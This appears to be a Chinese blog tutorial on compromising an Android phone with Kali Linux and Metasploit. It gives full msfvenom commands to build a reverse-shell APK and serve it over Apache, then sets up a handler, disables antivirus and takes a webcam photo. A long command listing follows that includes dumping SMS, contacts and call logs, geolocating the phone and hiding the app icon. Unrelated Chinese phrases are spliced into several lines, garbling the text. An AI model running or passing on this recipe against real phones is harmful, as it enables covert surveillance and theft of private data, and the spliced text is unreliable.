使⽤kali对安卓⼿机进⾏渗透测试
实验环境:Kali虚拟机⼀台,4G运⾏,IP地址192.168.0.105;安卓⼿机⼀部,建议使⽤不⽤的破⼿机实验⽬的:对安卓机进⾏攻击测试 实验步骤:
(⼀),配置卡⾥环境
1,kali配置⽹络web of science
┌──(root kali)-[~]
└─#ifconfig 查看kali本机IP地址
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.105 netmask 255.255.255.0 broadcast 192.168.0.255
并联电容补偿装置inet6 fe80::20c:29ff:fe43:e515 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:43:e5:15 txqueuelen 1000 (Ethernet)
RX packets 24 bytes 3795 (3.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18 bytes 2110 (2.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
再生制动device interrupt 18 base 0x2000
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 12 bytes 556 (556.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 12 bytes 556 (556.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
2,⽣成攻击的payload并隐藏在kali的web服务中
──(root kali)-[~]
└─# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=8848 R >8848tj
sj.apk ⽣成攻击⽂件(LHOST为kali本地IP地址,LPOR T为kali的本地监听端⼝,R为指定⽂件格式,apk为安卓可执⾏程序⽂件)
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10187 bytes
┌──(root kali)-[~]
└─# mv /var/www/html/index.html / 将kali的Apache中默认⽹页⽂件移⾛或删除
┌──(root kali)-[~]
└─# mv /var/www/inx-debian.html / 将kali的Apache中默认⽹页⽂件移⾛或删除
┌──(root kali)-[~]
└─# ls /var/www/html 查看,⽹页⽂件为空
┌──(root kali)-[~]
└─# cp 8848tjsj.apk /var/www/html 将攻击程序⽂件复制到kali的Apache默认⽹页⽂件
┌──(root kali)-[~]
└─# systemctl start apache2.service 开启kali的Apache服务
![在这⾥插⼊图⽚描述](img-blog.csdnimg/20210212140833910.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_1 0,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2x4eTEyM19jb20=,size_16,color_FFFFFF,t_70)4,使⽤⼿机访问卡⾥IP地址来下载病毒程序
3,开启metasploit进⾏渗透
┌──(root kali)-[~]
└─# msfconsole 开启测试框架
msf6 > use multi/handler 调⽤模块
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp 使⽤之前设置的攻击安卓⼿机的payload payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set 查看设置选项
Global
======
No entries in data store.
Module: multi/handler
=====================
Name Value
---- -----
ContextInformationFile
DisablePayloadHandler false
EnableContextEncoding false
ExitOnSession true
ListenerTimeout 0
PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD android/meterpreter/reverse_tcp
VERBOSE false
WORKSPACE
WfsDelay 0
重铬酸钾msf6 exploit(multi/handler) > show options 查看必须设置的选项
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (android/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lhost 192.168.0.105 设置本机IP地址进⾏监听
lhost => 192.168.0.105
msf6 exploit(multi/handler) > set lport 8848 设置本机监听端⼝
lport => 8848
msf6 exploit(multi/handler) > run 执⾏后点击⼿机上安装的病毒程序
图灵奖[*] Started reverse TCP handler on 192.168.0.105:8848
[*] Sending stage (76781 bytes) to 192.168.0.103
[*] Meterpreter session 1 opened (192.168.0.105:8848 -> 192.168.0.103:56000) at 2021-02-12 13:18:53 +0800 meterpreter > run killav 先关闭软杀
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on
meterpreter > webcam_snap 拍摄照⽚
[*]
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/hAwvlKIu.jpeg
meterpreter > ? 查询可以使⽤的命令
Core Commands
=============
Command Description
------- -----------
Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session. transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
-
------ -----------
------- -----------
execute Execute a command
getenv Get one or more environment variable values
getuid Get the user that the server is running as
localtime Displays the target system local date and time
pgrep Filter processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam大连海事大学车祸
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Android Commands
================
Command Description
------- -----------
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
hide_app_icon Hide the app icon from the launcher
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wakelock Enable/Disable Wakelock
wlan_geolocate Get current lat-long using WLAN information
Application Controller Commands
===============================
Command Description
------- -----------
app_install Request to install apk file